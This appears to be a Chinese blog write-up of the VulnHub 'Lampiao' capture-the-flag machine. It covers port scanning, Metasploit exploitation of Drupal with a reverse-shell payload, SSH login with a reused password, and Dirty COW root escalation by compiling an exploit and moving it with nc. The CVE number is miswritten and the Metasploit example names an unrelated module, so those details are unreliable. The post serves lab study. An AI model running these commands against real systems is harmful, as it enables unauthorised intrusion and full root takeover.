• VulnHub — Lampiao


    信息收集  msfconsole    脏牛提权

     

    目录

    信息收集

    扫描ip和端口

    访问web 扫描目录

    漏洞发发现与利用 

    msfconsole 使用 

    python命令进入交互模式

    寻找配置信息 (找用户密码)

    脏牛提权


    信息收集

    扫描ip和端口

    namp -sP 扫描网段 ,得到靶机ip  

     利用nmap的TCP半开放扫描,对网站端口进行快速探测

    nmap -sS -p 1-65535 192.168.164.135

    该扫描方式因为它不打开一个完全的TCP连接,所以是使用频率最高的扫描方式。扫描结果发现开放22、80、1898端口

    可以通过-A  来详细扫描, -p扫描所有的端口 ,时间长一点

    nmap -A 192.168.164.133 -p 0-65535

    可以看到1898端口也是http服务

    访问web 扫描目录

    继续收集信息, 在1898 端口有页面

    80端口没有啥有用功能,在1898 端口 扫目录

     

    得到框架的版本信息 Drupal 7.54 

    漏洞发发现与利用 

    msfconsole 使用 

    1. 1.搜索利用脚本: search
    2. 2.进入利用脚本: use exploit/unix/ftp/proftpd_133c_backdoor
    3. 3.查看需要设置的参数: show options
    4. 4.设置参数: set rhost 192.168.1.4
    5. 5.设置payload: set payload cmd/unix/reverse
    6. 6.查看payload需要设置的参数: show options
    7. 7.设置payload参数:set rhost 192.168.1.4
    8. 8.输入命令: run, 执行攻击,成功getshell, 井且直接为root权限

    1,搜索脚本 search  

    2,利用脚本 use 

    3,查看需要参数 show options

     用18年的exp 就use 4 ,然后查看参数,yse就是需要设置的

    4,设置参数 set

    5,run 执行

    输入shell 连接上 

    python命令进入交互模式

    python -c 'import pty;pty.spawn("/bin/bash")'

    寻找配置信息 (找用户密码)

     找到数据库信息,密码

     找账号 发现一个tiago 

    ssh连接尝试 

    用数据库密码成功连接上 

    脏牛提权-法1

    cve-2016-5159

    影响:Linux内核版本大于2.6.22版本 (2007年发行,到2016年10月18日修复)
    低权限的用户可利用这一漏洞在本地进行提权

    接下来进行提权,首先查看下内核版本:uname -a

    版本符合

    在Kali中自带脏牛的脚本文件,searchsploit dirty,找到需要的文件路径

    返回取得Shell的终端,按【Ctrl】+【C】返回meterpreter的session会话上传cpp文件到/tmp目录下,因为该目录一般是所有用户都具有可读可写权限

    upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

     上传后再进入www-data的权限下,对cpp文件进行编译:

    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o re /tmp/40847.cpp -lutil
    
    1. -Wall
    2. 允许发出gcc能提供的所有有用的警告,也可以用 -W (warning) 来标记指定的警告
    3. -pedantic
    4. 允许发出 ANSI/ISO C 标准所列出的所有警告
    5. -ON
    6. 指定代码优化的级别为 N , o <= N <= 3
    7. -std = c++11
    8. 就是用按 C++ 2011标准来编译的
    9. -pthread
    10. 在 Linux 中要用到多线程时,需要链接 pthread 库
    11. -o re
    12. FILE 指定输出文件名,在编译为目标代码时,这一选项不是必须的。如果FILE没有指定,缺省文件名是a.out,这里是 re

    再运行编译后文件并将结果输出到一个文本中./re > test.txt

     命令执行后成功将root账号的密码改为dirtyCowFun

    ssh升级root 即可 

    脏牛提权-法2 

    手动将脏牛脚本压缩一下 传入靶机中

    先压缩脏牛脚本 , tar -cvf

    靶机上监听 4444端口 ,将监听内容输入到dcow.tar.gz 文件中

    nc -l 4444 > dcow.tar.gz 

    本机上向靶机发送  压缩好的文件 端口4444

    nc 192.168.164.135 4444 < dcow.tar.gz 

    靶机上收到压缩包,进行解压 tar -xvf

    解压得到脏牛脚本 

    然后通过目录找到脚本

    使用make命令 即可运行 

    make完后 发现多了一个dcow文件 ,运行dcow 就提权成功

     

  • 相关阅读:
    15-基于Nginx构建Tomcat集群
    大模型日报|今日必读的7篇大模型论文
    Numpy基础
    今晚8点不见不散
    使用 KubeBlocks 为 K8s 提供稳如老狗的数据库服务
    Go 使用 freecache 缓存
    【Linux】在Xilinx平台上实现UVC Gadget(1)
    js遍历数组
    Linux环境基础开发工具
    C语言--每日五道练习题--Day17
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/126570151